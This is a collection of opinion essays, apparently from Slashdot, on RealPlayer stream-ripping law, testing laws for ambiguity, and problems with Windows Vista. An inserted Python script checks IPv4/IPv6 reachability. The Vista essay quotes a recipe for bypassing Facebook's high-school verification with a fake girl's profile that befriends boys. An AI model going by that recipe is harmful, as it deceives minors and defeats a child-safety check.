Where I think RealPlayer will make the most difference in the long run is in its political and legal impact, by legitimizing stream-ripping as something that "real" companies, so to speak, are allowed to do. In 2006, Google sent a cease-and-desist letter to TechCrunch for hosting a tool that lets users save YouTube videos to their hard drives. Michael Arrington of TechCrunch blogged at the time, "I am likely to remove the tool to preserve my relationship with the company [Google/YouTube]", but the tool is still up, and I don't know whether it was ever taken down at all (TechCrunch did not respond to an inquiry). Today, there are more YouTube rippers than ever, several of them even running AdSense ads. (I'm not sure if that's within Google's rules, but I mentioned those sites while e-mailing back and forth with Google for this article, and they're all still running AdSense ads a week later.) Certainly Google would look pretty silly trying to force TechCrunch to take their ripper down today, now that Google itself is distributing RealPlayer as part of the Google Pack.
RealNetworks could argue that the main difference between RealPlayer 11, and the Streambox Ripper that they sued to have outlawed in 2001, was that the Streambox Ripper ignored the "do not copy" flag present in some RealAudio and RealVideo streams, and thus violated the Digital Millennium Copyright Act. RealNetworks says the do-not-copy flag is no longer used, having been supplanted by more sophisticated Digital Rights Management, and RealPlayer 11 will honor any DRM-protected streams and refuse to save them. But how much difference is there between "ignoring" the do-not-copy flag and "ignoring" the Terms of Service for sites like YouTube (which the program may not be aware of, but which its makers certainly are)?
We've all heard about the First Amendment implications of DeCSS code, the code for decrypting the copy-protection scheme on DVDs, being outlawed in the U.S. But the Streambox case set the bar for "violating the DMCA" considerably lower -- the Streambox Ripper didn't actively decrypt anything, it just ignored a flag set in the streaming media. What are the implications if "ignoring" a flag counts as "breaking" copy protection? Suppose Behemoth Corp releases Version 1 of some media format, and I release a third-party player that plays Version 1. Then Behemoth Corp releases the specs for Version 2 of the format, which is similar enough that it works in Version 1 players, except Version 2 now contains a "do-not-copy" flag, which my player doesn't know about. Is my player now illegal? (Well, in this case Behemoth Corp would just make sure that Version 2 doesn't play in Version 1 players. But what about general-purpose programs like Total Recorder that can record any sound playing through your computer to an MP3 file? Does that program become illegal if a company releases a new sound file format that they don't want to be copyable?) So I think the acceptance of RealPlayer has nudged us closer to legal acceptance of software that can interact with third-party sites and programs in a way that their makers don't like. That's good. It should not be against the law to make a program that interacts with third-party web sites in a way that they haven't given permission for, something I literally grew up saying.
It's brave of Google especially to be distributing RealPlayer along with the Google Pack, at the same time that YouTube is constantly attacked for enabling copyright violations. A content owner mounting a lawsuit against Google, would be foolish not to say something like, "Your Honor, not only does YouTube host thousands of videos violating the intellectual property rights of my clients, they even distribute a tool called RealPlayer that lets people violate YouTube's own Terms of Service by saving the videos to their hard drive!" Logically, of course, it's a weak argument -- RealPlayer is universally available whether Google distributes it or not -- but rhetorically the argument is golden.
On the other hand, since that hasn't happened, and RealPlayer 11 is pretty well entrenched after being out for a year, the result has probably been an expansion of our rights. Anyone else who got sued or threatened for releasing a ripping program would be able to point to RealNetworks. "Look at them, Your Honor, their Web site even tells people, 'Grab videos from thousands of Web sites with just one click', something that those 'thousands of Web sites' would probably not be thrilled with. If it's legal for RealNetworks to tell people that, how can it be illegal for me just to have a ripping program on my site?"
If a small-time programmer had made themselves a legal test case before RealPlayer 11 came out, things might have gone differently; it is an unfortunate truth that courts are probably more likely to consider something legal when it is done by a large and legitimate-looking company like RealNetworks. Big companies do well in court partly because their lawyers are paid to make good arguments, but they almost certainly also get more benefit of the doubt just by virtue of being big companies. I think the time is long overdue for using controlled experiments to measure the bias and objectivity of judges -- for example, having different actors, one white and one black, go into different courtrooms for "mock trials" (which the judges think are real), where both actors are standing trial for exactly identical crimes and their lawyers say exactly identical things, and repeat this experiment enough times to see how differently black and white defendants are treated. (We already see this, for example, in the disparity of sentences for powder cocaine vs. crack, but skeptics may have a point when they say that's not a controlled experiment, because the effects of crack and cocaine are different.) Similarly, have mock trials where a small-time "activist" and a large company are sued for doing exactly the same thing. I would bet that the disparity in the outcomes of those cases would far exceed any bias due to race or gender.
But since it was RealNetworks, with their lawyers and their NASDAQ listing and their former exec in the U.S. Senate, that brought ripping to the masses, that probably makes it OK for you and me. It's not fair, but in this case, it's a good thing.
-
Next Year's Laws, Now Out In Beta!
Frequent Slashdot Contributor Bennett Haselton writes with his latest which starts "If I were writing laws such that I wanted everybody to agree on how to interpret them, I would use the software development life cycle: First, have lawmakers (analogous to "developers") write drafts of the laws. Then a second group (the "test case writers") would try to come up with situations that would be interpreted ambiguously under the law. Then a third group, the "testers", would read the proposed law, read the test case situations, and try to determine how the law should be applied to those cases, without communicating with the law writers, the test case writers, or each other. If there's too much disagreement in the third group on how the law should be applied, then it's too vague to be a proper law. The only laws which made it through this process would be ones such that when they were finally passed, most citizens (the "users") could agree on how to interpret them, in cases sufficiently similar to the ones the test case writers could come up with."
The irony is that this is how laws are supposed to work anyway. Laws have been struck down as being "void for vagueness" on the theory that people ought to be able to read them and know what they mean. But what does "vagueness" mean, if not that different people cannot independently agree on what a law means, and even the nine highest-ranked legal experts in the country are split 5-4 on how to read it? Some Supreme Courts, such as under William Howard Taft, tried to reach unanimous verdicts whenever possible on the theory that it would persuade people of the correctness of their decisions. But unanimity doesn't prove anything if it was achieved by agreeing to agree. Only if judges were put in separate rooms and independently agreed on how to apply a law to a given case, would that prove that the clarity came from the text of the law itself. Legislators ought to start at least trying to pass laws that would meet that test.
For some reason we seem to have just accepted the alternative as the status quo, where laws are passed that express a general sentiment ("no spam with a 'misleading' subject line") but nobody thinks that you could put two people in different rooms and expect them to agree on how the law would apply in most cases. The parties involved in the first court cases may have to spend ruinously large amounts of money to get to the point where judges rule on how to interpret the law, only to find that lower court judges disagree with each other. Meanwhile, anybody bringing a case now has to look up not just the law, but reference the lower court rulings that support their side, while their opponent of course references the other rulings. And even if a case does finally get appealed up to the Supreme Court, which issues a ruling binding on all lower courts, future researchers still can't find out the state of "the law" by looking up the statute; they have to look up the statute and read the Supreme Court ruling which states how the statute should be read (which may still be ambiguous as applied to their current situation). All of this costs a lot of money, which results in a huge waste of resources if both sides can afford it, and tilts the playing field if only one of them can.
I wonder if the reason this is so widely tolerated is because people have absorbed the notion that making and interpreting laws has to be hard, like brain surgery. But brain surgery is hard because the brain is naturally complex and not man-made. Lawyers also have to learn a lot of complex procedures, but not as complex as brain surgery; the major difficulty in a court case is guessing how the judge may interpret an ambiguous law (which is not "difficult" so much as a matter of being lucky), and knowing the unwritten rules that govern what actually happens (including which written rules are followed and which ones are ignored). And there's no reason in principle why this guesswork couldn't be reduced by having laws be more clear to begin with, and putting the "unwritten rules" down on paper.
I watched a scaled-down version of this play out in the first few cases that I brought against spammers in Small Claims court in Washington (although it involved only a waste of resources, not money, since Small Claims doesn't allow lawyers). You know the chorus, so all together now: Some judges said you could sue people out-of-state, and some said you couldn't. Some judges said you could sue for statutory damages in Small Claims, and some said you could only sue if you'd lost money. Some judges said that you could represent a corporation that you own, and some said that if you're a non-lawyer, you can't even represent your own corporation. Some said you could sue under a federal law in Small Claims, and some said you could only sue under a federal law in federal court. There are many more examples, and those were just the contradictions about Small Claims court procedure generally, not even counting the specific issues raised by the anti-spam law.
But as much as I've complained about that in the past, I don't blame the judges for that part. If the law is unclear, then judges have to come down one way or the other. (What I've complained about is when judges say that their interpretation is "the law", and that if you don't get it, you have to do more research. Lawyers know to take this kind of comment with a grain of salt, but a non-lawyer who takes it at face value, could end up wasting dozens of hours or hundreds of dollars in lawyer's fees before realizing that the judge's interpretation was not actually the law, and a different judge might have said the opposite. The judge should just be honest and say, "Well, I'm the ref and this is how I'm calling it. On another day with another judge you might get something else." I've had cases heard by some judges who basically said as much.) Often both interpretations are reasonable, but that's the point -- if both interpretations are reasonable, then there's something wrong with the way the law is written!
For example, there was the judge who said that you couldn't sue in Small Claims unless you'd lost money, because Small Claims jurisdiction is limited to "cases for the recovery of money only if the amount claimed does not exceed four thousand dollars". Most judges interpreted "recovery of money only" to mean that Small Claims courts can only award money damages, and not, for example, order someone to return property. Two judges, however, said that "recovery of money" implied that you could only literally "recover" money that you used to have and then lost (relying on the common English meaning of the word "recover"). In legal jargon, however, "recover" often simply means taking something from another party, and I won one such case on appeal after I submitted three Supreme Court rulings as evidence that used the phrase "recover statutory damages" or "recover punitive damages" in that sense, since statutory damages and punitive damages refer to money over and above what the plaintiff actually lost. (The original judges did not change their minds, but one of them later recused herself from any future spam cases filed by me, a move that I thought was questionable.)
Here's another example where there's no excuse for the law not to be completely clear, since it's specifying a number. To appeal a Small Claims ruling in Washington, you have to post a bond for "twice the amount of the judgment and costs, or twice the amount in controversy, whichever is greater". Presumably the "amount in controversy" means the amount that the plaintiff was suing for. But hang on -- in Small Claims you can't possibly be awarded more than you sued for. And that means the "the amount of the judgment and costs" will always be less than or equal to "the amount in controversy"! So why not just say "twice the amount in controversy"?
Or perhaps the "amount in controversy" only means the amount that the plaintiff and defendant disagree on. So if you sue someone for $2000, and the defendant agrees on the first $500 but not the remaining $1,500, and the judge's interpretation falls in between and she awards you $1,200, how much of a bond do you post if you want to appeal? $3,000, literally twice the "amount in controversy" between you and the defendant? $2,400, twice the amount of the judgment? $1,600, twice the difference between what you sought and what the judge awarded you? $4,000, twice the amount you sued for?
Beats me. When I first started out, I'd drive myself and my lawyer friends crazy asking, "Well, what's the rule? What's the answer?" Well, now I know: There is no rule, it just depends on what the judge says. Actually in this case, it depends on what the clerk says -- because it's the clerk at the courtroom's front office, not the judge, who handles the paperwork for an appeal and checks that you posted a bond for the right amount, so you have clerks effectively deciding how to interpret the law. (Just last week, after I sued a telemarketer for $1,500 and won a judgment for $565, the telemarketer appealed by posting a bond for twice that amount, or $1,130. This doesn't seem correct under any interpretation of the law, since the "amount in controversy", however you define it, was greater than the "amount of the judgment" of $565.)
Sometimes, courts have settled on how to interpret a rule, but the interpretation is still different from what the rule actually says. The Small Claims form that you serve on defendants says, "You are further notified that, in case you do not appear, judgment will be rendered against you for the amount of the claim as stated herein below..." This is not true -- you can lose even if the other party does not appear (if the judge thinks, for example, that a spam's subject line was not misleading enough). I understand that having that line on the form serves a useful purpose by getting people to show up. But it's still wrong, and everybody knows that it's wrong, and it's on the form anyway.
A more serious example: When I first started suing spammers, if I thought they would show up in court, I'd sometimes try to go to the trouble of catching them in a lie, like the guy who showed up and claimed he didn't know anything about any spam, before I showed that I had recorded a phone call where he admitted that he could send out 5 million e-mails from Chinese servers for $500. (Yes, taping the call was legal -- follow the link for more info.) The written rule is that if you lie under oath in court, you can be arrested for committing a felony, even if the case is only a civil trial. But it turns out the unwritten rule is that perjury in a civil case is almost never prosecuted, and in most of my cases where I had proof that the defendant lied, the best that would happen was that I'd just win the civil case anyway, and sometimes not even that. It's not just Small Claims, either -- in one currently ongoing case, the defendant's lawyer just filed an answer to our complaint stating "Plaintiff subscribed to receive our e-mails". There's absolutely no way their attorney believes that to be true (with the spam in question being sent by mortgage spammers from forged domains, it's hard to see how anyone could "subscribe" to receive those mails even if they wanted to), but attorneys are required to submit such briefs with good faith in their veracity. So why isn't he on the hook for that? Because of the unwritten rule that courts just don't make a big deal out of it.
The point is that none of these issues is hard to grasp. The difficulty lies not in understanding the problems, but in the impossibility of guessing how a judge will interpret an ambiguous rule -- or, in the case of an unwritten rule which contradicts the written ones, the difficulty of knowing the unwritten rule if you don't have a lawyer's experience.
So, ambiguous laws could be divided into three categories:
- Laws and rules where there ought to be no ambiguity at all -- for example, rules about who can be sued where, and for how much, and what size bond you have to post if you want to appeal. The fact that these laws are not clear enough to be universally agreed upon, is just silly. (Again, if judges have a conference or an e-mail discussion and decide on an interpretation, that doesn't mean the law as written was clear -- in fact, the fact that they had to have that discussion, proves that it wasn't.)
- "Unwritten rules" that are generally agreed upon by lawyers and judges, but which are not actually written down or may even contradict the rules codified into law. Are trials and proceedings actually conducted according to written rules? The acid test for this would be: Hire a physics professor or somebody (so the legal establishment can't use the excuse of calling him a dumbass) and have him look at the history of events and documents in a typical civil case, from the vantage point of one side's lawyer. At each stage in the proceeding, before the professor sees what the lawyer actually did next, have the prof try to figure out what they would have done, based on the written rules. (The question is not whether the prof would have come up with the same strategy as the lawyer, but whether they would have done something that was procedurally correct at all.) If there are too many cases where the professor does something that technically conforms to the written rules, but where the lawyer says it would have been rejected by the court as procedurally invalid -- and if the same thing keeps happening with more and more smart non-lawyers trying the same experiment -- then this suggests that either the procedures need to be changed to conform with the written rules, or the written rules should conform with the procedures. (Because actually changing laws and rules is so hard, a better idea would be to publish an "annotated version" of the court rules which describes the procedures the way they are actually followed.)
- Laws governing situations where ambiguity is hard to get rid of -- for example, the part of the Washington anti-spam law prohibiting "misleading subject lines". Here the question is whether a mushy category like that could ever be clearly defined so that people would independently agree on what it meant.
For the first two categories, bringing some clarity to those laws ought to be a no-brainer. Some candidate like Ron Paul or Dennis Kucinich who can say whatever they want because they're not going to win anyway, should make an issue out of it. They wouldn't have to fix the problem all at once. They could just promote it as a core American value that has been overlooked: Laws and court rules should be clear, and they can't be called clear unless people can independently agree on how to read them. The Left could get behind it because it would bring more equality between the rich and poor in the legal system. The Right could get behind it because they style themselves as the party backing judges who are "strict constructionists" that apply the law as literally as possible. (Although at the risk of alienating potential right-wing supporters, I don't think that "strict constructionism" would have much meaning until laws are clarified using something like this process. To say that this or that judge is a "strict constructionist" under our current laws, often sounds to me like a bunch of hooey, when the laws are too ambiguous for anybody to strictly construct anything out of them. Clarence Thomas, who is often held out as an example of a "strict constructionist" judge, has said that Tinker vs. Des Moines, the Supreme Court case that extended First Amendment rights to high school students, is "without basis in the Constitution". But there's nothing in the First Amendment to say that it's limited to individuals over 18, although ironically most "strict constructionist" judges and their supporters, read it as if it is.)
The third category of ambiguous laws would be more interesting to try to fix. Would it be possible to come up with a standard for a "misleading" subject line that everyone could agree on? Probably not. But I think you could measure the ambiguity of a law by using testers and test case writers in the kind of procedure I suggested in the first paragraph, and you could get to the point where there was less disagreement among the testers on how to interpret the law as applied to typical subject lines.
If lawmakers knew in advance that their laws would be subject to that kind of test, they would write them more clearly the first time around. Why couldn't laws be written to include a list of hypothetical situations, for example, specifying which situations the law covered and which ones it didn't? For example, a list of sample spam e-mails to illustrate what the law means by a "misleading subject line". Of course, the trouble with picking examples to illustrate your own points, is that people tend to pick examples that fall squarely in the middle of the categories they're illustrating ("your refund has been processed" is misleading, "printer cartridges for sale" is not). If the lawmaker included illustrative cases like this that were too-obvious examples of what they were describing, then the "test case writers" would be able to shoot down the proposed law by picking hypothetical cases that were closer to the borderline (so that in the third phase, when the testers tried to apply the law to those borderline cases, different testers would classify the borderline cases differently, and the law would fail the vagueness test). To mitigate this, the author of the law should pick illustrative examples that would be at or near the borderline, thus providing clearer guidance as to where the boundary lies between a misleading and non-misleading subject line. Which is what they should be doing in the first place.
Now, there are some problems that even the double-blind test for unambiguous laws, would not solve:
- Judges could be systematically biased against a particular law (and even proud of it), in which case they can make things difficult for you even if the law is unambiguous. Or, they might be so biased in favor of a law that they carry it further than the clearly prescribed boundaries, as in the case of a judge who upheld the conviction of a man for sending sexually explicit instant messages, even though the law in question was clearly limited to e-mails.
- Judges may not take cases seriously from non-lawyers. In one series of cases that I brought, I filed written motions with two of the pages stuck together by a tiny thread of paper, so that after the judge ruled, I could examine the motions in the court file to see if the thread was still intact. I found that about half the time, the judge had rejected the motion without reading it.
This is a hard obstacle to overcome, especially after the Commission on Judicial Conduct ruled that it was not a violation of the Code of Conduct for a judge to reject a motion without even turning the pages. It wouldn't do any good to show that judges ruled against pro se (self-representing) plaintiffs more often than against lawyers, because judges could claim it was because pro se plaintiffs just made more errors (although it would be hard to use this excuse to explain why judges rejected briefs without reading them at all). One way to test this would be to have judges conduct the trials "blind" so that they would see the briefs presented by each side, but they wouldn't know whether the brief was submitted by a lawyer or a non-lawyer representing themselves. However, this would require difficult changes to the way legal procedures are conducted.
A simpler way might be: Once the "unwritten rule book" has been authored, such that your typical non-lawyer in the above experiment knows what kind of briefs to submit at each stage of a trial, have a legally trained third party look at briefs written by the non-lawyer and briefs written by an average lawyer, and see if they can tell which is which. If the third party can't tell, then that indicates the non-lawyer is writing the briefs almost indistinguishably from a lawyer -- and then if a judge in a real trial keeps hammering them for "procedural violations", it would be because of the judge's knowledge that the party was a non-lawyer, and not because of what the party actually did. On the other hand, if the judge ruled against the person in the same proportion that that person's briefs were being flagged as "obviously written by a non-lawyer" in the double-blind experiment, then that would indicate the judge was being fair.
- Even if a law is perfectly unambiguous, judges may disagree on whether it is constitutional under the First Amendment, for example. Making these situations unambiguous would involve tampering with the First Amendment, probably not a good idea in this or any other political climate.
- It wouldn't do anything about the corrupt process by which laws are often passed in the first place, in exchange for campaign contributions. (As one scholarly analysis says, "It's exactly like buying a hamburger, except that under our laws, everybody must pretend that nobody is buying anything, and nobody is selling anything.")
But notwithstanding these problems, I think any law that could pass the double-blind interpretation test, would be an improvement over one that can't. First, because it appeals to our sense of fairness to have rules clearly laid out. Second, if we really followed the void for vagueness doctrine, laws would be able to pass that test anyway. Third, economists have documented that there are economic benefits to having stability and predictability in the law. Economist Thomas Sowell wrote in Race and Culture that in some historical periods, even when groups were given second-class status under the law (such as Jews in Eastern Europe or the Chinese in Southeast Asia), they were able to prosper better than they did elsewhere, as long as their basic property rights were protected, and the laws, even the discriminatory ones, were consistent and predictable!
This isn't something that would require a wholesale change in a state's constitution or lawmaking procedure. Any legislator could voluntarily try this process out to see if it resulted in laws that were easier for constituents to understand, and had a greater chance of being interpreted by judges to give the result that the legislator wanted. Imagine having an anti-spam law, for example, which said:
Misleading subject lines are prohibited. This includes not only subject lines which contain false advertising, such as:
- 'lotion that cures baldness'
- 'legal copies of Windows for $20'
but also subject lines that mislead the user into wasting time on a message. This is because a large part of the harm done by spam is not due to the falsity of the advertisements, but due to the time that users waste on each message before realizing that it's an advertisement. As such, misleading subject lines include those that mislead the user into thinking that the message is from a personal acquaintance, such as:
- 'Congratulations!'
- 'Touching base'
or a subject that misleads the user into thinking that the message is a 1-on-1 communication, such as:
- 'Re: Question about your website'
- 'Shareholder request'
- 'urgent cancer call'
- 'Reminder: link to your website http://slashdot.org/'
[Except for the first group, all of these are subject lines from real spams that I received, which Small Claims judges ruled were not misleading. Giving them the benefit of the doubt, I think they are applying the standard of whether a spam constitutes fraudulent or deceptive advertising, not whether it tricks you into opening it. But the original author of the anti-spam law, when talking about other proposed measures, stated that the point of anti-spam laws is that "Computer users should be able to know instantly what's spam and what isn't."]
If you were reading a series of legal statutes and came across one written like this, it would be jarring, like reading a Wikipedia article about cell division and then getting to the part where someone wrote "And Bennett is gaytarded". But that's because we're accustomed to laws being ambiguous, not spelling out how they should be interpreted using reasons and examples. I would like to see some lawmaker, somewhere, insert a law into their state's legal code that looked and sounded something like this. The idea is so radical that maybe it could only be done by an eccentric, like the congressman who had Elmo testify before a Congressional committee before he was arrested for bribery (the Congressman, not Elmo), or the guy who passed a House Resolution commending Napoleon Dynamite ("any members who choose to vote 'Nay' on this concurrent resolution are "FREAKIN' IDIOTS!"). Or maybe it would be up to a regular lawmaker who thinks, what the hell, let's write a law so that people can agree on what it means, and see if it starts a trend.
As for taking the rules that ought to be clear once and for all, like who can be sued where and for how much, some 3%-getting-candidate should start talking about it. When I read an article about how some lawsuit was stalled because a lawyer complained that it was filed in the wrong district, I can barely keep reading because I get sidetracked thinking this is such a pathetic reflection on our legal system. If the rule about where the suit can be filed is unambiguous, why aren't the lawyers sanctioned for raising it as a false issue? If the rule really is ambiguous, why hasn't it been made clear a long time ago? If you support (or are) a politician or candidate who wants to ask these questions, the field is wide open.
-
-
Hostile ta Vista, Baby
Frequent Slashdot contributor Bennett Haselton adds his experience to the litany of woes with Microsoft Vista. Unlike most commentators who have a beef with the operating system, Bennett does a bit of surveying to bolster his points. Read his account by clicking on the magic link.
My brand-new-out-of-the-box Windows Vista machine could not access www.facebook.com. A nearby XP machine could, but the Vista machine couldn't. I went back to Circuit City to try out the other Vista demo machines, and they could access other sites but not Facebook, either. And that honeymoon feeling that you get when you buy a new computer and expect it to solve all your problems, was over for me. Having built my latest career on helping people access Facebook where they were blocked from it, by some cosmic joke was Vista now blocking me from getting to Facebook on my own machine?
I know, another article bashing Vista, what could be more banal. (Kids! That word, meaning "trite" or "unoriginal", is pronounced "ba-NAHL". If you say it the wrong way like I did in an interview, it sounds naughty and you sound stupid.) But in my own random survey of 30 Vista users on Amazon's Mechanical Turk service (a handy way to check these things), three quarters (23) said the only reason they were using Vista was that the PC store they went to didn't sell XP machines any more, and about half of all respondents (14) said that they would go back to Windows XP if they could. So I don't want to get a bunch of e-mails with Ron Paul links in the signature saying "Nobody has to use Vista if they don't want to!" (I'm aware that a survey of 30 people is too small to be scientific, but it's enough to get a ballpark figure for about $5 on Mechanical Turk.) Besides, the more people write testimonials to what they found frustrating about Vista, the more likely it is that some future version will keep what is good about the new OS, while providing a less frustrating interface (suggested name: "Vista 98").
It turns out the Facebook issue was not really Microsoft's fault -- www.facebook.com had a broken IPv6 record, and Vista defaults to using IPv6 where XP used IPv4, so that's why the host wasn't working. (In case you run into this with any other Web sites on Vista, I fixed the problem by disabling IPv6 in network settings and rebooting.) But it was one more example of something that used to work pre-Vista and then stopped working, and every case like that adds up to the overall frustration of switching to a new system, regardless of whose fault it is.
I hasten to add that I am not some partisan Microsoft basher. I like XP just fine, never more than when I went back to it after a few days on Vista, and I still think for that matter that Vista would be easier to switch to than Linux. Having been involved for years with free speech activism, I run into a lot of people in the same circles who are strong Linux advocates, apparently because the concept of "freedom of speech" is closely aligned with "making every file search as simple and stress-free as a Hamas hostage negotiation". So every year or two I'll try out the latest version of some Linux distro to see how long it would take to get used to it. In 2005, full of optimism, I cheerfully booted up the latest version of Shrike, then tried to find a directory and discovered I could not right-click on the hard drive root dir and specify the name of a directory I wanted to search for (that only worked for files, not directories). I posted a query to a Linux newsgroup, and a respondent told me that the solution was to open a command prompt and type "man find", which I am aware is a polite way of saying "screw you, newbie", but which I dutifully followed anyway and got an output screen of which the first paragraph was:
find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence (see section OPERATORS), until the outcome is known (the left hand side is false for and operations, true for or), at which point find moves on to the next file name.
and that was all my Linux for that year. Maybe I'm overdue to try it again. (Microsoft gives away their Virtual PC program that makes it easy to try other operating systems; I think it's a ploy to make us appreciate Windows more.) Now, I love the concept of a freely-distributable, freely-modifiable operating system, and I've recommended Linux to people when you need it to do something cool that Windows can't do, like bypassing Windows security by booting a PC from a CD. And it's done a lot of good for organizations like the One Laptop Per Child program, which can keep their costs down by using a free operating system. But to this day I've never heard an answer to one question: Since even Linux advocates admit that it's harder to use, what can you do with Linux that you can't do with Windows, to make it worth switching over to? If I was nervous about Vista because some of the interface had changed and some of my old programs no longer worked, it wasn't helpful to tell me to switch to a system where all of the interface would change and none of my old programs would work.
So, I wanted to like Vista. I knew that eventually everyone would have to upgrade anyway, so, not wanting to be left behind, I wanted to switch to Vista because of the same factor that spammers use to get your attention: "Other guys are improving themselves, why aren't you?" But there were some things I ran into almost immediately:
- Windows Explorer and Internet Explorer no longer have the "File / Edit / View" menu bars across the top of the window. Was this a big problem under XP? When the menus gave quick, two-click access to most actions that you could take within the application, was there a grassroots movement to have them removed? I did eventually find that you can hit the "Alt" key to bring the menus back, but why put people through that frustration? The most annoying feeling while using a computer is being yanked out of thinking about what you're doing with the computer to having to concentrate on how to use it.
Perhaps the idea was to steer users towards using the buttons on the toolbar, but there aren't enough buttons to cover all the options located under the menus. If the UI designers wanted to steer users gently towards using the buttons, my suggestion would have been: Whenever the user picks something under a menu that corresponds to something accessible from the toolbar, display a dialog box which says for example, "In the future, you can print faster by clicking the printer button on the toolbar", along with a picture (and a "Do not show this message again" checkbox -- important!).
- Windows Explorer also did away with the "Up" button that lets you browse from the current directory to the higher-level directory. Again, probably not in response to a groundswell of users demanding for that button to be removed, when it took up about one square centimeter of screen space. Supposedly Windows Explorer makes up for this by displaying the entire path to the current directory in the address bar, so that if the path is "C:\Financial Records\Chris Pirillo\Pectoral Real Estate\", you can click on "Chris Pirillo" to go one directory higher. The trouble is that I frequently give my directories extremely long and descriptive names like (this is a real example) "Flash-Player-8.5.0.246-beta2.downloaded-2006-03-20-from-labs.macromedia.com" so that I can keep track of where and when I got each piece of downloaded software, in case I ever need to go back to a previous version that the software maker no longer makes available because they're trying to steer me away from it (ironically, "Vista syndrome"). With a directory that has a long name like that, the higher-level directories aren't visible in the address bar, so I had to locate it manually in the left-hand tree view panel. OK, knock off the violins, the point is that I didn't have to do that in XP.
- I have an older monitor, so I wanted to turn ClearType off. The IE7 help file describes how to do this in IE, but that didn't work for me no matter how many times I tried, and my eyes were aching by the time I found out that in Vista it's a default system-wide setting that overrides IE's setting until you change the system-wide one. I would have suggested putting one line in the IE7 help file: "Note: if your operating system such as Windows Vista is set to use ClearType system-wide, you must disable this as well to disable ClearType in IE."
- Virtual PC, which worked on all versions of Windows XP, is not supported on Vista Home Premium. I need Virtual PC (for reasons other than Linux-bashing), so this was a deal-breaker.
- Telnet is no longer installed by default. Even though I use a different telnet program for regular use, telnet.exe was handy to test whether a remote machine was reachable on a given port. (For example, in a command prompt, type "telnet www.yahoo.com 80" and when the command prompt screen goes blank, that means the machine www.yahoo.com is accepting connections on port 80, the standard port for Web traffic. Try connecting to port 81 instead, and you get no response on that port. This can be useful when diagnosing problems with Web servers and other programs.) Even though it's not hard to get telnet back, why would they go to the trouble of removing it?
- The aforementioned Facebook problem. This seemed so startling at the time that I almost stopped everything to write an article just about that, musing on Microsoft having so much power that all PC stores were now exclusively stocking computers running an OS that, at the time anyway, couldn't access Facebook. But then I asked another bunch of users on Mechanical Turk, and all respondents using Vista said they could access Facebook after all. Of course, this wasn't a random sample, since users who bought Vista and couldn't access Facebook, probably would have returned their machines a long time ago, but I'm still not sure what caused it to work on some machines and not others -- all I know is that Facebook was inaccessible until I disabled IPv6.
I know Facebook is reading these articles, since in November I wrote about how you could circumvent Facebook's system of verifying that users were real high school students, by doing the following: "(1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back". Shortly afterwards, Facebook changed the verification system, so that now, if you're confirming someone who is a pending member of a high school network but no one else has confirmed them yet, Facebook warns you, "Only check this box if you're absolutely sure that you know this person." So, whichever of Mark Zuckerberg's friends is reading my articles: Clever idea, and, keep the IPv6 records working.
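A per-address-family version of the telnet port check described above, added here as an example and not taken from the article: it connects over IPv4 and IPv6 separately, so a name whose IPv6 record is published but does not answer (the Facebook case in the article) is reported as such. The function names and verdict labels are this example's own, and the demo addresses are constructed from documentation ranges.

```python
import socket

# Verdict labels are this example's own naming.
DUAL_STACK_OK = "dual-stack-ok"   # reachable over IPv4 and IPv6
IPV4_ONLY = "ipv4-only"           # no IPv6 address published, IPv4 works
IPV6_BROKEN = "ipv6-broken"       # IPv6 address published but no connect
IPV4_BROKEN = "ipv4-broken"       # IPv4 address published but no connect
IPV6_ONLY = "ipv6-only"           # no IPv4 address published, IPv6 works
UNREACHABLE = "unreachable"       # nothing answered on this port


def probe(host, port, family, timeout=3.0):
    """TCP-connect to every address `host` has in one address family.

    Returns a list of (address, connected, detail). An empty list means
    the name has no address of that family at all.
    """
    try:
        infos = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)
    except socket.gaierror:
        return []
    results, seen = [], set()
    for fam, stype, proto, _canon, sockaddr in infos:
        addr = sockaddr[0]
        if addr in seen:
            continue
        seen.add(addr)
        try:
            with socket.socket(fam, stype, proto) as sock:
                sock.settimeout(timeout)
                sock.connect(sockaddr)
            results.append((addr, True, "connected"))
        except OSError as exc:  # refused, timed out, no route, ...
            results.append((addr, False, exc.strerror or type(exc).__name__))
    return results


def classify(v4, v6):
    """Turn two probe() result lists into one verdict."""
    v4_ok = any(ok for _addr, ok, _detail in v4)
    v6_ok = any(ok for _addr, ok, _detail in v6)
    if v4_ok and v6_ok:
        return DUAL_STACK_OK
    if v4_ok:
        # An address that exists but never connects is the failure mode
        # that only shows up on clients that try IPv6 first.
        return IPV6_BROKEN if v6 else IPV4_ONLY
    if v6_ok:
        return IPV4_BROKEN if v4 else IPV6_ONLY
    return UNREACHABLE


def diagnose(host, port, timeout=3.0):
    """Probe both families and return (verdict, ipv4_results, ipv6_results)."""
    v4 = probe(host, port, socket.AF_INET, timeout)
    v6 = probe(host, port, socket.AF_INET6, timeout)
    return classify(v4, v6), v4, v6


if __name__ == "__main__":
    # Offline demo: a listener bound to the IPv4 loopback only.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    print("127.0.0.1:", diagnose("127.0.0.1", port, timeout=2.0)[0])
    srv.close()

    # Constructed results for a name with a working IPv4 address and an
    # IPv6 address that times out (documentation-range addresses).
    sample_v4 = [("192.0.2.10", True, "connected")]
    sample_v6 = [("2001:db8::10", False, "timed out")]
    print("constructed sample:", classify(sample_v4, sample_v6))
```

Against a real host, `diagnose("www.example.com", 80)` gives the same answer the blank telnet screen does, once per protocol.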
That was as far as I got before I stopped trying to get used to Vista and started taking notes for this article (working title: "Vist Vucked"). From the Mechanical Turk users who responded to my survey, the other most common reported problems were: software compatibility, hardware compatibility, difficulty with the UI, and running too slowly. Presumably the first two problems will improve over time, but the UI will always be hard to switch to as long as users can't find functions that were easily locatable in the old interface, and if it runs slower than XP, that will always be a factor no matter how fast your computer is. (However fast it runs Vista, you'd always be able to make it run even faster with XP instead!)
The best things I've heard about Vista have been that (a) it is the most secure Windows ever (which Dave Barry says is like calling asparagus the "most articulate vegetable ever"), and (b) it features better multimedia integration. To which my responses were: (a) the number of incomprehensible warnings that Vista flashes at a user whenever they look at the computer funny, does not make it more secure, because users will condition themselves to just ignore those warnings, and (b) I hate watching TV on my computer anyway.
